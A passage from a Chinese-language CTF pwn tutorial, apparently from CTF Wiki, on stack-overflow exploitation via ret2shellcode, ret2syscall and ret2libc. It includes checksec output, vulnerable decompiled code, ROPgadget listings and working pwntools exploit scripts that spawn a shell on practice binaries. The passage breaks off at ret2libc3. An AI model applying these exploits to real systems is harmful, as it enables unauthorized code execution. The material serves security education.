rwx [stack]<br></code></pre></td></tr></tbody></table></figure>

<p>通过 vmmap，我们可以看到 bss 段对应的段具有可执行权限</p>
<figure class="highlight awk"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-number">0</span>x0804a000 <span class="hljs-number">0</span>x0804b000 <span class="hljs-number">0</span>x00001000 rwx <span class="hljs-regexp">/mnt/</span>hgfs<span class="hljs-regexp">/Hack/</span>CTF-Learn<span class="hljs-regexp">/pwn/</span>stack<span class="hljs-regexp">/example/</span>ret2shellcode/ret2shellcode<br></code></pre></td></tr></tbody></table></figure>

<p>那么这次我们就控制程序执行 shellcode，也就是读入 shellcode，然后控制程序执行 bss 段处的 shellcode。其中，相应的偏移计算类似于 ret2text 中的例子。</p>
<p>具体的 payload 如下</p>
<figure class="highlight mipsasm"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm"><span class="hljs-comment">#!/usr/bin/env python</span><br>from pwn import *<br><br><span class="hljs-keyword">sh </span>= process(<span class="hljs-string">'./ret2shellcode'</span>)<br><span class="hljs-keyword">shellcode </span>= asm(<span class="hljs-keyword">shellcraft.sh())</span><br><span class="hljs-keyword"></span><span class="hljs-keyword">buf2_addr </span>= <span class="hljs-number">0x804a080</span><br><br><span class="hljs-keyword">sh.sendline(shellcode.ljust(112, </span><span class="hljs-string">'A'</span>) + p32(<span class="hljs-keyword">buf2_addr))</span><br><span class="hljs-keyword"></span><span class="hljs-keyword">sh.interactive()</span><br></code></pre></td></tr></tbody></table></figure>

<h3 id="题目-¶"><a href="#题目-¶" class="headerlink" title="题目 ¶"></a>题目 <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#_5">¶</a></h3><ul>
<li>sniperoj-pwn100-shellcode-x86-64</li>
</ul>
<h2 id="ret2syscall¶"><a href="#ret2syscall¶" class="headerlink" title="ret2syscall¶"></a>ret2syscall<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#ret2syscall">¶</a></h2><h3 id="原理-¶-2"><a href="#原理-¶-2" class="headerlink" title="原理 ¶"></a>原理 <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#_6">¶</a></h3><p>ret2syscall，即控制程序执行系统调用，获取 shell。</p>
<h3 id="例子-¶-2"><a href="#例子-¶-2" class="headerlink" title="例子 ¶"></a>例子 <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#_7">¶</a></h3><p>这里我们以 bamboofox 中的 ret2syscall 为例</p>
<p>点击下载: <a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2syscall/bamboofox-ret2syscall/rop">ret2syscall</a></p>
<p>首先检测程序开启的保护</p>
<figure class="highlight yaml"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-string">➜</span>  <span class="hljs-string">ret2syscall</span> <span class="hljs-string">checksec</span> <span class="hljs-string">rop</span><br>    <span class="hljs-attr">Arch:</span>     <span class="hljs-string">i386-32-little</span><br>    <span class="hljs-attr">RELRO:</span>    <span class="hljs-string">Partial</span> <span class="hljs-string">RELRO</span><br>    <span class="hljs-attr">Stack:</span>    <span class="hljs-literal">No</span> <span class="hljs-string">canary</span> <span class="hljs-string">found</span><br>    <span class="hljs-attr">NX:</span>       <span class="hljs-string">NX</span> <span class="hljs-string">enabled</span><br>    <span class="hljs-attr">PIE:</span>      <span class="hljs-literal">No</span> <span class="hljs-string">PIE</span> <span class="hljs-string">(0x8048000)</span><br></code></pre></td></tr></tbody></table></figure>

<p>可以看出，源程序为 32 位，开启了 NX 保护。接下来利用 IDA 来查看源码</p>
<figure class="highlight cpp"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-function"><span class="hljs-type">int</span> __cdecl <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span></span><br><span class="hljs-function"></span>{<br>  <span class="hljs-type">int</span> v4; <span class="hljs-comment">// [sp+1Ch] [bp-64h]@1</span><br><br>  <span class="hljs-built_in">setvbuf</span>(stdout, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>);<br>  <span class="hljs-built_in">setvbuf</span>(stdin, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>);<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">"This time, no system() and NO SHELLCODE!!!"</span>);<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">"What do you plan to do?"</span>);<br>  <span class="hljs-built_in">gets</span>(&amp;v4);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></tbody></table></figure>

<p>可以看出此次仍然是一个栈溢出。类似于之前的做法，我们可以获得 v4 相对于 ebp 的偏移为 108。所以我们需要覆盖的返回地址相对于 v4 的偏移为 112。此次，由于我们不能直接利用程序中的某一段代码或者自己填写代码来获得 shell，所以我们利用程序中的 gadgets 来获得 shell，而对应的 shell 获取则是利用系统调用。关于系统调用的知识，请参考</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://zh.wikipedia.org/wiki/%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8">https://zh.wikipedia.org/wiki/%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8</a></li>
</ul>
<p>简单地说，只要我们把对应获取 shell 的系统调用的参数放到对应的寄存器中，那么我们在执行 int 0x80 就可执行对应的系统调用。比如说这里我们利用如下系统调用来获取 shell</p>
<figure class="highlight stylus"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">execve</span><span class="hljs-params">(<span class="hljs-string">"/bin/sh"</span>,NULL,NULL)</span></span><br></code></pre></td></tr></tbody></table></figure>

<p>其中，该程序是 32 位，所以我们需要使得</p>
<ul>
<li>系统调用号，即 eax 应该为 0xb</li>
<li>第一个参数，即 ebx 应该指向 /bin/sh 的地址，其实执行 sh 的地址也可以。</li>
<li>第二个参数，即 ecx 应该为 0</li>
<li>第三个参数，即 edx 应该为 0</li>
</ul>
<p>而我们如何控制这些寄存器的值 呢？这里就需要使用 gadgets。比如说，现在栈顶是 10，那么如果此时执行了 pop eax，那么现在 eax 的值就为 10。但是我们并不能期待有一段连续的代码可以同时控制对应的寄存器，所以我们需要一段一段控制，这也是我们在 gadgets 最后使用 ret 来再次控制程序执行流程的原因。具体寻找 gadgets 的方法，我们可以使用 ropgadgets 这个工具。</p>
<p>首先，我们来寻找控制 eax 的 gadgets</p>
<figure class="highlight x86asm"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs x86asm">➜  ret2syscall ROPgadget --binary rop  --only <span class="hljs-string">'pop|ret'</span> | grep <span class="hljs-string">'eax'</span><br><span class="hljs-number">0x0809ddda</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">eax</span> <span class="hljs-comment">; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="hljs-number">0x080bb196</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">eax</span> <span class="hljs-comment">; ret</span><br><span class="hljs-number">0x0807217a</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">eax</span> <span class="hljs-comment">; ret 0x80e</span><br><span class="hljs-number">0x0804f704</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">eax</span> <span class="hljs-comment">; ret 3</span><br><span class="hljs-number">0x0809ddd9</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">es</span> <span class="hljs-comment">; pop eax ; pop ebx ; pop esi ; pop edi ; ret</span><br></code></pre></td></tr></tbody></table></figure>

<p>可以看到有上述几个都可以控制 eax，我选取第二个来作为 gadgets。</p>
<p>类似的，我们可以得到控制其它寄存器的 gadgets</p>
<figure class="highlight x86asm"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs x86asm">➜  ret2syscall ROPgadget --binary rop  --only <span class="hljs-string">'pop|ret'</span> | grep <span class="hljs-string">'ebx'</span><br><span class="hljs-number">0x0809dde2</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ds</span> <span class="hljs-comment">; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="hljs-number">0x0809ddda</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">eax</span> <span class="hljs-comment">; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="hljs-number">0x0805b6ed</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebp</span> <span class="hljs-comment">; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="hljs-number">0x0809e1d4</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; pop ebp ; pop esi ; pop edi ; ret</span><br><span class="hljs-number">0x080be23f</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; pop edi ; ret</span><br><span class="hljs-number">0x0806eb69</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; pop edx ; ret</span><br><span class="hljs-number">0x08092258</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; pop esi ; pop ebp ; ret</span><br><span class="hljs-number">0x0804838b</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; pop esi ; pop edi ; pop ebp ; ret</span><br><span class="hljs-number">0x080a9a42</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; pop esi ; pop edi ; pop ebp ; ret 0x10</span><br><span class="hljs-number">0x08096a26</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; pop esi ; pop edi ; pop ebp ; ret 0x14</span><br><span class="hljs-number">0x08070d73</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; pop esi ; pop edi ; pop ebp ; ret 0xc</span><br><span class="hljs-number">0x0805ae81</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; pop esi ; pop edi ; pop ebp ; ret 4</span><br><span class="hljs-number">0x08049bfd</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; pop esi ; pop edi ; pop ebp ; ret 8</span><br><span class="hljs-number">0x08048913</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; pop esi ; pop edi ; ret</span><br><span class="hljs-number">0x08049a19</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; pop esi ; pop edi ; ret 4</span><br><span class="hljs-number">0x08049a94</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; pop esi ; ret</span><br><span class="hljs-number">0x080481c9</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; ret</span><br><span class="hljs-number">0x080d7d3c</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; ret 0x6f9</span><br><span class="hljs-number">0x08099c87</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; ret 8</span><br><span class="hljs-number">0x0806eb91</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ecx</span> <span class="hljs-comment">; pop ebx ; ret</span><br><span class="hljs-number">0x0806336b</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">edi</span> <span class="hljs-comment">; pop esi ; pop ebx ; ret</span><br><span class="hljs-number">0x0806eb90</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">edx</span> <span class="hljs-comment">; pop ecx ; pop ebx ; ret</span><br><span class="hljs-number">0x0809ddd9</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">es</span> <span class="hljs-comment">; pop eax ; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="hljs-number">0x0806eb68</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">esi</span> <span class="hljs-comment">; pop ebx ; pop edx ; ret</span><br><span class="hljs-number">0x0805c820</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">esi</span> <span class="hljs-comment">; pop ebx ; ret</span><br><span class="hljs-number">0x08050256</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">esp</span> <span class="hljs-comment">; pop ebx ; pop esi ; pop edi ; pop ebp ; ret</span><br><span class="hljs-number">0x0807b6ed</span> : <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ss</span> <span class="hljs-comment">; pop ebx ; ret</span><br></code></pre></td></tr></tbody></table></figure>

<p>这里，我选择</p>
<figure class="highlight arcade"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs arcade"><span class="hljs-number">0x0806eb90</span> : <span class="hljs-built_in">pop</span> edx ; <span class="hljs-built_in">pop</span> ecx ; <span class="hljs-built_in">pop</span> ebx ; ret<br></code></pre></td></tr></tbody></table></figure>

<p>这个可以直接控制其它三个寄存器。</p>
<p>此外，我们需要获得 /bin/sh 字符串对应的地址。</p>
<figure class="highlight asciidoc"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc">➜  ret2syscall ROPgadget --binary rop  --string <span class="hljs-emphasis">'/bin/sh'</span> <br><span class="hljs-section">Strings information</span><br><span class="hljs-section">============================================================</span><br>0x080be408 : /bin/sh<br></code></pre></td></tr></tbody></table></figure>

<p>可以找到对应的地址，此外，还有 int 0x80 的地址，如下</p>
<figure class="highlight asciidoc"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc">➜  ret2syscall ROPgadget --binary rop  --only <span class="hljs-emphasis">'int'</span>                 <br><span class="hljs-section">Gadgets information</span><br><span class="hljs-section">============================================================</span><br>0x08049421 : int 0x80<br>0x080938fe : int 0xbb<br>0x080869b5 : int 0xf6<br>0x0807b4d4 : int 0xfc<br><br>Unique gadgets found: 4<br></code></pre></td></tr></tbody></table></figure>

<p>同时，也找到对应的地址了。</p>
<p>下面就是对应的 payload，其中 0xb 为 execve 对应的系统调用号。</p>
<figure class="highlight makefile"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs makefile"><span class="hljs-comment">#!/usr/bin/env python</span><br>from pwn import *<br><br>sh = process('./rop')<br><br>pop_eax_ret = 0x080bb196<br>pop_edx_ecx_ebx_ret = 0x0806eb90<br>int_0x80 = 0x08049421<br>binsh = 0x80be408<br>payload = flat(<br>    ['A' * 112, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, binsh, int_0x80])<br>sh.sendline(payload)<br>sh.interactive()<br></code></pre></td></tr></tbody></table></figure>

<h3 id="题目-¶-1"><a href="#题目-¶-1" class="headerlink" title="题目 ¶"></a>题目 <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#_8">¶</a></h3><h2 id="ret2libc¶"><a href="#ret2libc¶" class="headerlink" title="ret2libc¶"></a>ret2libc<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#ret2libc">¶</a></h2><h3 id="原理-¶-3"><a href="#原理-¶-3" class="headerlink" title="原理 ¶"></a>原理 <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#_9">¶</a></h3><p>ret2libc 即控制函数的执行 libc 中的函数，通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下，我们会选择执行 system(“/bin/sh”)，故而此时我们需要知道 system 函数的地址。</p>
<h3 id="例子-¶-3"><a href="#例子-¶-3" class="headerlink" title="例子 ¶"></a>例子 <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#_10">¶</a></h3><p>我们由简单到难分别给出三个例子。</p>
<h4 id="例-1¶"><a href="#例-1¶" class="headerlink" title="例 1¶"></a>例 1<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#1">¶</a></h4><p>这里我们以 bamboofox 中 ret2libc1 为例</p>
<p>点击下载: <a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2libc/ret2libc1/ret2libc1">ret2libc1</a></p>
<p>首先，我们可以检查一下程序的安全保护</p>
<figure class="highlight yaml"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-string">➜</span>  <span class="hljs-string">ret2libc1</span> <span class="hljs-string">checksec</span> <span class="hljs-string">ret2libc1</span>    <br>    <span class="hljs-attr">Arch:</span>     <span class="hljs-string">i386-32-little</span><br>    <span class="hljs-attr">RELRO:</span>    <span class="hljs-string">Partial</span> <span class="hljs-string">RELRO</span><br>    <span class="hljs-attr">Stack:</span>    <span class="hljs-literal">No</span> <span class="hljs-string">canary</span> <span class="hljs-string">found</span><br>    <span class="hljs-attr">NX:</span>       <span class="hljs-string">NX</span> <span class="hljs-string">enabled</span><br>    <span class="hljs-attr">PIE:</span>      <span class="hljs-literal">No</span> <span class="hljs-string">PIE</span> <span class="hljs-string">(0x8048000)</span><br></code></pre></td></tr></tbody></table></figure>

<p>源程序为 32 位，开启了 NX 保护。下面来看一下程序源代码，确定漏洞位置</p>
<figure class="highlight cpp"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-function"><span class="hljs-type">int</span> __cdecl <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span></span><br><span class="hljs-function"></span>{<br>  <span class="hljs-type">int</span> v4; <span class="hljs-comment">// [sp+1Ch] [bp-64h]@1</span><br><br>  <span class="hljs-built_in">setvbuf</span>(stdout, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>);<br>  <span class="hljs-built_in">setvbuf</span>(_bss_start, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>);<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">"RET2LIBC &gt;_&lt;"</span>);<br>  <span class="hljs-built_in">gets</span>((<span class="hljs-type">char</span> *)&amp;v4);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></tbody></table></figure>

<p>可以看到在执行 gets 函数的时候出现了栈溢出。此外，利用 ropgadget，我们可以查看是否有 /bin/sh 存在</p>
<figure class="highlight asciidoc"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc">➜  ret2libc1 ROPgadget --binary ret2libc1 --string <span class="hljs-emphasis">'/bin/sh'</span>          <br><span class="hljs-section">Strings information</span><br><span class="hljs-section">============================================================</span><br>0x08048720 : /bin/sh<br></code></pre></td></tr></tbody></table></figure>

<p>确实存在，再次查找一下是否有 system 函数存在。经在 ida 中查找，确实也存在。</p>
<figure class="highlight ada"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ada">.plt:<span class="hljs-number">08048460</span> ; [<span class="hljs-number">00000006</span> BYTES: COLLAPSED <span class="hljs-keyword">FUNCTION</span> <span class="hljs-title">_system.</span> PRESS CTRL-NUMPAD+ TO EXPAND]<br></code></pre></td></tr></tbody></table></figure>

<p>那么，我们直接返回该处，即执行 system 函数。相应的 payload 如下</p>
<figure class="highlight gradle"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs gradle">#!<span class="hljs-regexp">/usr/</span>bin/env python<br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>sh = process(<span class="hljs-string">'./ret2libc1'</span>)<br><br>binsh_addr = <span class="hljs-number">0</span>x8048720<br>system_plt = <span class="hljs-number">0</span>x08048460<br>payload = flat([<span class="hljs-string">'a'</span> * <span class="hljs-number">112</span>, system_plt, <span class="hljs-string">'b'</span> * <span class="hljs-number">4</span>, binsh_addr])<br>sh.sendline(payload)<br><br>sh.interactive()<br></code></pre></td></tr></tbody></table></figure>

<p>这里我们需要注意函数调用栈的结构，如果是正常调用 system 函数，我们调用的时候会有一个对应的返回地址，这里以’bbbb’ 作为虚假的地址，其后参数对应的参数内容。</p>
<p>这个例子相对来说简单，同时提供了 system 地址与 /bin/sh 的地址，但是大多数程序并不会有这么好的情况。</p>
<h4 id="例-2¶"><a href="#例-2¶" class="headerlink" title="例 2¶"></a>例 2<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#2">¶</a></h4><p>这里以 bamboofox 中的 ret2libc2 为例</p>
<p>点击下载: <a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2libc/ret2libc2/ret2libc2">ret2libc2</a></p>
<p>该题目与例 1 基本一致，只不过不再出现 /bin/sh 字符串，所以此次需要我们自己来读取字符串，所以我们需要两个 gadgets，第一个控制程序读取字符串，第二个控制程序执行 system(“/bin/sh”)。由于漏洞与上述一致，这里就不在多说，具体的 exp 如下</p>
<figure class="highlight vim"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs vim">##!/usr/bin/env <span class="hljs-keyword">python</span><br>from pwn import *<br><br><span class="hljs-keyword">sh</span> = process(<span class="hljs-string">'./ret2libc2'</span>)<br><br>gets_plt = <span class="hljs-number">0</span>x08048460<br>system_plt = <span class="hljs-number">0</span>x08048490<br>pop_ebx = <span class="hljs-number">0</span>x0804843d<br>buf2 = <span class="hljs-number">0</span>x804a080<br>payload = flat(<br>    [<span class="hljs-string">'a'</span> * <span class="hljs-number">112</span>, gets_plt, pop_ebx, buf2, system_plt, <span class="hljs-number">0</span>xdeadbeef, buf2])<br><span class="hljs-keyword">sh</span>.sendline(payload)<br><span class="hljs-keyword">sh</span>.sendline(<span class="hljs-string">'/bin/sh'</span>)<br><span class="hljs-keyword">sh</span>.interactive()<br></code></pre></td></tr></tbody></table></figure>

<p>需要注意的是，我这里向程序中 bss 段的 buf2 处写入 /bin/sh 字符串，并将其地址作为 system 的参数传入。这样以便于可以获得 shell。</p>
<h4 id="例-3¶"><a href="#例-3¶" class="headerlink" title="例 3¶"></a>例 3<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#3">¶</a></h4><p>这里以 bamboofox 中的 ret2libc3 为例</p>
<p>点击下载: <a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2libc/ret2libc3/ret2libc3">ret2libc3</a></p>
<p>在例 2 的基础上，再次将 system 函数的地址去掉。此时，我们需要同时找到 system 函数地址与 /bin/sh 字符串的地址。首先，查看安全保护</p>
<figure class="highlight yaml"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-string">➜</span>  <span class="hljs-string">ret2libc3</span> <span class="hljs-string">checksec</span> <span class="hljs-string">ret2libc3</span><br>    <span class="hljs-attr">Arch:</span>     <span class="hljs-string">i386-32-little</span><br>    <span class="hljs-attr">RELRO:</span>    <span class="hljs-string">Partial</span> <span class="hljs-string">RELRO</span><br>    <span class="hljs-attr">Stack:</span>    <span class="hljs-literal">No</span> <span class="hljs-string">canary</span> <span class="hljs-string">found</span><br>    <span class="hljs-attr">NX:</span>       <span class="hljs-string">NX</span> <span class="hljs-string">enabled</span><br>    <span class="hljs-attr">PIE:</span>      <span class="hljs-literal">No</span> <span class="hljs-string">PIE</span> <span class="hljs-string">(0x8048000)</span><br></code></pre></td></tr></tbody></table></figure>

<p>可以看出，源程序仍旧开启了堆栈不可执行保护。进而查看源码，发现程序的 bug 仍然是栈溢出</p>
<figure class="highlight cpp"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-function"><span class="hljs-type">int</span> __cdecl <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span></span><br><span class="hljs-function"></span>{<br>  <span class="hljs-type">int</span> v4; <span class="hljs-comment">// [sp+1Ch] [bp-64h]@1</span><br><br>  <span class="hljs-built_in">setvbuf</span>(stdout, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>);<br>  <span class="hljs-built_in">setvbuf</span>(stdin, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>);<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">"No surprise anymore, system disappeard QQ."</span>);<br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Can you find it !?"</span>);<br>  <span class="hljs-built_in">gets</span>((<span class="hljs-type">char</span> *)&amp;v4);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></tbody></table></figure>

<p>那么我们如何得到 system 函数的地址呢？这里就主要利用了两个知识点</p>
<ul>
<li>system 函数属于 libc，而 libc.so 动态链接库中的函数之间相对偏移是固定的。</li>
<li>即使程序有 ASLR 保护，也只是针对于地址中间位进行随机，最低的 12 位并不会发生改变。而 libc 在 github 上有人进行收集，如下</li>
<li><a target="_blank" rel="noopener" href="https://github.com/niklasb/libc-database">https://github.com/niklasb/libc-database</a></li>
</ul>
<p>所以如果我们知道 libc 中某个函数的地址，那么我们就可以确定该程序利用的 libc。进而我们就可以知道 system 函数的地址。</p>
